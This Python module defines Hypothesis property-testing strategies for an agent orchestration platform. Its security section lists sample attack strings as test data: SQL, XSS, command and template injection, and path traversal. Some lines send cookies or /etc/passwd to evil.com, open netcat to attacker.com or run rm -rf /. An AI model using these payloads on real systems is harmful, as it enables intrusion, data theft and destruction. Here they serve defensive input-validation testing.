"""
Hypothesis strategies for property-based testing of Agent Orchestration Platform.
This module provides comprehensive testing strategies for:
- Domain type generation (AgentId, SessionId, etc.)
- Valid and invalid input patterns
- Security-focused malicious input generation
- Configuration and state object generation
- Edge case and boundary condition testing
Integrates with ADDER+ techniques for maximum test coverage and quality assurance.
Author: Adder_1 | Created: 2025-06-26 | Testing Infrastructure Task
"""
from hypothesis import strategies as st
from typing import NewType, Dict, Any, List, Optional, Union
import string
import re
from pathlib import Path
from datetime import datetime, timedelta
from dataclasses import dataclass
# Import type hints for strategy generation
# Note: These will be replaced with actual imports once types are implemented
AgentId = NewType('AgentId', str)
SessionId = NewType('SessionId', str)
ProcessId = NewType('ProcessId', int)
# ============================================================================
# Core Domain Type Strategies
# ============================================================================
def agent_id_strategy() -> st.SearchStrategy[str]:
"""Generate valid agent ID strings."""
return st.builds(
lambda prefix, uuid_part: f"{prefix}_{uuid_part}",
st.just("agent"),
st.text(
alphabet=string.ascii_lowercase + string.digits,
min_size=8,
max_size=16
)
)
def session_id_strategy() -> st.SearchStrategy[str]:
"""Generate valid session ID strings."""
return st.builds(
lambda prefix, uuid_part: f"{prefix}_{uuid_part}",
st.sampled_from(["session", "dev", "prod", "test"]),
st.text(
alphabet=string.ascii_lowercase + string.digits + "-",
min_size=8,
max_size=32
)
)
def agent_name_strategy() -> st.SearchStrategy[str]:
"""Generate valid agent names following Agent_# pattern."""
return st.builds(
lambda n: f"Agent_{n}",
st.integers(min_value=1, max_value=999)
)
def invalid_agent_name_strategy() -> st.SearchStrategy[str]:
"""Generate invalid agent names for testing validation."""
return st.one_of([
# Wrong case patterns
st.builds(lambda n: f"agent_{n}", st.integers(min_value=1, max_value=99)),
st.builds(lambda n: f"AGENT_{n}", st.integers(min_value=1, max_value=99)),
# Missing underscore
st.builds(lambda n: f"Agent{n}", st.integers(min_value=1, max_value=99)),
# Non-numeric suffixes
st.builds(lambda s: f"Agent_{s}", st.text(
alphabet=string.ascii_letters, min_size=1, max_size=10
)),
# Invalid numbers
st.just("Agent_0"),
st.just("Agent_-1"),
st.just("Agent_"),
st.just("Agent"),
# Whitespace issues
st.builds(lambda n: f" Agent_{n}", st.integers(min_value=1, max_value=99)),
st.builds(lambda n: f"Agent_{n} ", st.integers(min_value=1, max_value=99)),
# Empty and special cases
st.just(""),
st.just(" "),
st.just("_"),
st.just("Agent_1.5"),
])
def process_id_strategy() -> st.SearchStrategy[int]:
"""Generate valid process IDs."""
return st.integers(min_value=1, max_value=65535)
# ============================================================================
# File System and Path Strategies
# ============================================================================
def safe_filename_strategy() -> st.SearchStrategy[str]:
"""Generate safe filenames for testing."""
return st.text(
alphabet=string.ascii_letters + string.digits + "_-.",
min_size=1,
max_size=50
).filter(
lambda x: not x.startswith('.') and x not in ['.', '..'] and '/' not in x
)
def safe_directory_name_strategy() -> st.SearchStrategy[str]:
"""Generate safe directory names."""
return st.text(
alphabet=string.ascii_letters + string.digits + "_-",
min_size=1,
max_size=30
).filter(
lambda x: not x.startswith('.') and x not in ['.', '..']
)
def relative_path_strategy() -> st.SearchStrategy[str]:
"""Generate safe relative paths."""
return st.builds(
lambda parts: "/".join(parts),
st.lists(safe_directory_name_strategy(), min_size=1, max_size=5)
)
def absolute_path_strategy() -> st.SearchStrategy[str]:
"""Generate absolute paths for testing."""
return st.builds(
lambda root, rel: f"/{root}/{rel}",
st.sampled_from(["home", "tmp", "var", "opt"]),
relative_path_strategy()
)
def malicious_path_strategy() -> st.SearchStrategy[str]:
"""Generate malicious path patterns for security testing."""
return st.one_of([
# Path traversal attacks
st.just("../../../etc/passwd"),
st.just("..\\..\\..\\windows\\system32\\config\\sam"),
st.builds(lambda n: "../" * n + "etc/passwd", st.integers(min_value=1, max_value=10)),
# Null byte injection
st.builds(lambda path: f"{path}\\x00.txt", safe_filename_strategy()),
# Long paths
st.builds(lambda name: "/" + name * 100, safe_filename_strategy()),
# Special device files
st.sampled_from(["/dev/null", "/dev/zero", "/dev/random", "CON", "PRN", "AUX"]),
# Unicode normalization attacks
st.sampled_from(["file\u202e.txt", "test\u200b.py", "data\ufeff.json"]),
])
# ============================================================================
# Security and Malicious Input Strategies
# ============================================================================
def sql_injection_strategy() -> st.SearchStrategy[str]:
"""Generate SQL injection patterns."""
return st.sampled_from([
"'; DROP TABLE agents; --",
"' OR '1'='1",
"'; DELETE FROM sessions WHERE 1=1; --",
"' UNION SELECT password FROM users --",
"'; INSERT INTO agents VALUES ('evil'); --",
"admin'--",
"' OR 1=1 #",
"'; EXEC xp_cmdshell('rm -rf /'); --",
])
def xss_injection_strategy() -> st.SearchStrategy[str]:
"""Generate XSS injection patterns."""
return st.sampled_from([
"<script>alert('xss')</script>",
"<img src=x onerror=alert('xss')>",
"javascript:alert('xss')",
"<svg onload=alert('xss')>",
"<iframe src='javascript:alert(1)'></iframe>",
"<body onload=alert('xss')>",
"<script>document.location='http://evil.com/steal?data='+document.cookie</script>",
"';alert('xss');//",
"\"><script>alert('xss')</script>",
"<script>eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))</script>"
])
def command_injection_strategy() -> st.SearchStrategy[str]:
"""Generate command injection patterns."""
return st.sampled_from([
"$(rm -rf /)",
"; cat /etc/passwd",
"| nc attacker.com 4444",
"; wget http://evil.com/backdoor.sh",
"'; curl -X POST http://evil.com/data -d @/etc/passwd",
"`whoami`",
"$(curl http://evil.com/$(whoami))",
"; python -c \"import os; os.system('rm -rf /')\"",
"&& curl -d \"$(cat /etc/passwd)\" http://evil.com",
])
def template_injection_strategy() -> st.SearchStrategy[str]:
"""Generate template injection patterns."""
return st.sampled_from([
"{{7*7}}",
"${7*7}",
"#{7*7}",
"<%= 7*7 %>",
"{{config}}",
"{{request}}",
"${jndi:ldap://evil.com/a}",
"{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}",
"{{''.join(self.__dict__)}}",
"{{config.items()}}",
])
def malicious_input_strategy() -> st.SearchStrategy[str]:
"""Comprehensive malicious input strategy combining all attack vectors."""
return st.one_of([
sql_injection_strategy(),
xss_injection_strategy(),
command_injection_strategy(),
template_injection_strategy(),
malicious_path_strategy(),
# Additional malicious patterns
st.sampled_from([
"\\x00\\x00\\x00\\x00", # Null bytes
"A" * 1000, # Buffer overflow attempt
"${IFS}cat${IFS}/etc/passwd", # Bash IFS exploitation
"eval(document.cookie)", # JavaScript eval
"data:text/html,<script>alert('xss')</script>", # Data URI XSS
"file:///etc/passwd", # File URI scheme
"gopher://evil.com/", # Gopher protocol
"ftp://evil.com/backdoor", # FTP protocol
"\r\n\r\nHTTP/1.1 200 OK\r\n", # HTTP response splitting
]),
# Random binary data
st.binary(min_size=1, max_size=100).map(
lambda x: x.decode('utf-8', errors='ignore')
),
# Very long strings
st.text(min_size=1000, max_size=10000),
])
# ============================================================================
# Configuration and State Object Strategies
# ============================================================================
def claude_config_strategy() -> st.SearchStrategy[Dict[str, Any]]:
"""Generate Claude Code configuration objects."""
return st.builds(
dict,
model=st.sampled_from(["sonnet-3.5", "opus-3", "haiku-3", "invalid-model"]),
no_color=st.booleans(),
verbose=st.booleans(),
skip_permissions=st.booleans(),
memory_limit=st.integers(min_value=64, max_value=4096),
timeout=st.integers(min_value=10, max_value=300),
working_directory=st.one_of([
absolute_path_strategy(),
st.none(),
malicious_path_strategy()
]),
custom_args=st.lists(st.text(min_size=1, max_size=50), max_size=10)
)
def resource_limits_strategy() -> st.SearchStrategy[Dict[str, Any]]:
"""Generate resource limit configurations."""
return st.builds(
dict,
max_memory_mb=st.integers(min_value=128, max_value=2048),
max_cpu_percent=st.floats(min_value=0.1, max_value=1.0),
max_processes=st.integers(min_value=1, max_value=16),
max_files=st.integers(min_value=100, max_value=10000),
max_runtime_seconds=st.integers(min_value=60, max_value=3600)
)
def security_context_strategy() -> st.SearchStrategy[Dict[str, Any]]:
"""Generate security context configurations."""
return st.builds(
dict,
encryption_enabled=st.booleans(),
audit_level=st.sampled_from(["DEBUG", "INFO", "WARNING", "ERROR"]),
max_sessions=st.integers(min_value=1, max_value=32),
max_agents_per_session=st.integers(min_value=1, max_value=16),
require_authentication=st.booleans(),
allowed_directories=st.lists(absolute_path_strategy(), max_size=10),
blocked_commands=st.lists(st.text(min_size=1, max_size=50), max_size=20)
)
# ============================================================================
# Agent and Session State Strategies
# ============================================================================
def agent_status_strategy() -> st.SearchStrategy[str]:
"""Generate agent status values."""
return st.sampled_from([
"CREATED", "STARTING", "ACTIVE", "IDLE",
"ERROR", "TERMINATED", "UNKNOWN"
])
def agent_specialization_strategy() -> st.SearchStrategy[str]:
"""Generate agent specialization strings."""
return st.one_of([
st.sampled_from([
"ADDER+ Implementation",
"Security Testing",
"Performance Optimization",
"Documentation",
"Code Review",
"Integration Testing",
"Bug Fixing",
"Architecture Design"
]),
st.text(min_size=0, max_size=100), # Allow arbitrary specializations
st.just(""), # Empty specialization
malicious_input_strategy() # Test security with malicious specializations
])
def agent_state_strategy() -> st.SearchStrategy[Dict[str, Any]]:
"""Generate agent state objects for testing."""
return st.builds(
dict,
agent_id=agent_id_strategy(),
session_id=session_id_strategy(),
name=agent_name_strategy(),
status=agent_status_strategy(),
specialization=agent_specialization_strategy(),
iterm_tab_id=st.one_of([
st.text(alphabet=string.ascii_letters + string.digits, min_size=8, max_size=16),
st.none()
]),
process_id=st.one_of([process_id_strategy(), st.none()]),
created_at=st.datetimes(
min_value=datetime(2025, 1, 1),
max_value=datetime(2025, 12, 31)
).map(lambda dt: dt.isoformat()),
last_heartbeat=st.datetimes(
min_value=datetime.now() - timedelta(hours=1),
max_value=datetime.now() + timedelta(minutes=5)
).map(lambda dt: dt.isoformat()),
resource_usage=st.builds(
dict,
memory_mb=st.integers(min_value=0, max_value=2048),
cpu_percent=st.floats(min_value=0, max_value=100),
files_open=st.integers(min_value=0, max_value=1000)
)
)
def session_state_strategy() -> st.SearchStrategy[Dict[str, Any]]:
"""Generate session state objects for testing."""
return st.builds(
dict,
session_id=session_id_strategy(),
name=st.text(min_size=1, max_size=100),
root_path=absolute_path_strategy(),
created_at=st.datetimes(
min_value=datetime(2025, 1, 1),
max_value=datetime.now()
).map(lambda dt: dt.isoformat()),
agents=st.dictionaries(
agent_id_strategy(),
agent_state_strategy(),
max_size=8
),
security_context=security_context_strategy(),
performance_metrics=st.builds(
dict,
total_agents_created=st.integers(min_value=0, max_value=100),
active_agents=st.integers(min_value=0, max_value=8),
average_response_time=st.floats(min_value=0.1, max_value=10.0),
error_count=st.integers(min_value=0, max_value=50)
)
)
# ============================================================================
# Message and Communication Strategies
# ============================================================================
def message_content_strategy() -> st.SearchStrategy[str]:
"""Generate message content for testing."""
return st.one_of([
# Normal messages
st.text(min_size=1, max_size=1000),
# ADDER+ system prompts
st.builds(
lambda agent_name: f"You are {agent_name}\\n\\n# ELITE CODE AGENT: ADDER+...",
agent_name_strategy()
),
# Code snippets
st.sampled_from([
"```python\\ndef hello():\\n print('Hello, World!')\\n```",
"```javascript\\nconsole.log('test');\\n```",
"```bash\\necho 'testing'\\n```"
]),
# Malicious content for security testing
malicious_input_strategy(),
# Edge cases
st.just(""),
st.text(min_size=10000, max_size=50000), # Very long messages
st.just("\\n\\n\\n"), # Only whitespace
st.just("\\x00\\x01\\x02"), # Binary data
])
def mcp_tool_request_strategy() -> st.SearchStrategy[Dict[str, Any]]:
"""Generate MCP tool request objects."""
return st.builds(
dict,
tool_name=st.sampled_from([
"create_agent", "delete_agent", "create_session",
"delete_session", "send_message_to_agent",
"get_session_status", "clear_agent_conversation",
"start_new_agent_conversation"
]),
parameters=st.dictionaries(
st.text(min_size=1, max_size=50),
st.one_of([
st.text(),
st.integers(),
st.booleans(),
st.none(),
malicious_input_strategy()
]),
max_size=10
),
context=st.builds(
dict,
client_id=st.text(min_size=1, max_size=50),
request_id=st.text(min_size=1, max_size=50),
timestamp=st.datetimes().map(lambda dt: dt.isoformat())
)
)
# ============================================================================
# Property Test Helper Strategies
# ============================================================================
def create_type_strategy(type_class, **field_overrides):
"""
Create a Hypothesis strategy for testing type validation properties.
Args:
type_class: The dataclass or type to generate strategies for
**field_overrides: Override strategies for specific fields
"""
if hasattr(type_class, '__annotations__'):
field_strategies = {}
for field_name, field_type in type_class.__annotations__.items():
if field_name in field_overrides:
field_strategies[field_name] = field_overrides[field_name]
elif field_type == str:
field_strategies[field_name] = st.text(min_size=0, max_size=100)
elif field_type == int:
field_strategies[field_name] = st.integers()
elif field_type == bool:
field_strategies[field_name] = st.booleans()
elif field_type == float:
field_strategies[field_name] = st.floats(allow_nan=False, allow_infinity=False)
elif hasattr(field_type, '__origin__') and field_type.__origin__ is list:
field_strategies[field_name] = st.lists(st.text(), max_size=10)
elif hasattr(field_type, '__origin__') and field_type.__origin__ is dict:
field_strategies[field_name] = st.dictionaries(st.text(), st.text(), max_size=10)
else:
# Default to None for complex types
field_strategies[field_name] = st.none()
return st.builds(type_class, **field_strategies)
else:
return st.none()
def edge_case_strategy(base_strategy: st.SearchStrategy) -> st.SearchStrategy:
"""Enhance a base strategy with edge cases."""
return st.one_of([
base_strategy,
st.none(), # None values
st.just(""), # Empty strings (if applicable)
st.builds(str, malicious_input_strategy()), # Convert malicious inputs to strings
])
# ============================================================================
# Composite Testing Scenarios
# ============================================================================
def concurrent_agent_scenario_strategy() -> st.SearchStrategy[Dict[str, Any]]:
"""Generate scenarios for concurrent agent testing."""
return st.builds(
dict,
num_agents=st.integers(min_value=2, max_value=16),
operations_per_agent=st.integers(min_value=1, max_value=10),
session_count=st.integers(min_value=1, max_value=4),
stress_factor=st.floats(min_value=0.1, max_value=2.0),
failure_rate=st.floats(min_value=0.0, max_value=0.3),
message_frequency=st.floats(min_value=0.1, max_value=5.0)
)
def security_test_scenario_strategy() -> st.SearchStrategy[Dict[str, Any]]:
"""Generate comprehensive security testing scenarios."""
return st.builds(
dict,
attack_vectors=st.lists(
st.sampled_from([
"sql_injection", "xss", "command_injection",
"path_traversal", "privilege_escalation",
"resource_exhaustion", "input_validation_bypass"
]),
min_size=1, max_size=5
),
malicious_inputs=st.lists(malicious_input_strategy(), min_size=1, max_size=20),
target_endpoints=st.lists(
st.sampled_from([
"create_agent", "send_message", "create_session",
"file_operations", "authentication", "configuration"
]),
min_size=1, max_size=8
),
escalation_attempts=st.booleans(),
persistence_attempts=st.booleans()
)
# Export commonly used strategies for easy importing
__all__ = [
'agent_id_strategy', 'session_id_strategy', 'agent_name_strategy',
'invalid_agent_name_strategy', 'malicious_input_strategy',
'agent_state_strategy', 'session_state_strategy', 'claude_config_strategy',
'message_content_strategy', 'mcp_tool_request_strategy',
'security_test_scenario_strategy', 'concurrent_agent_scenario_strategy',
'create_type_strategy', 'edge_case_strategy'
]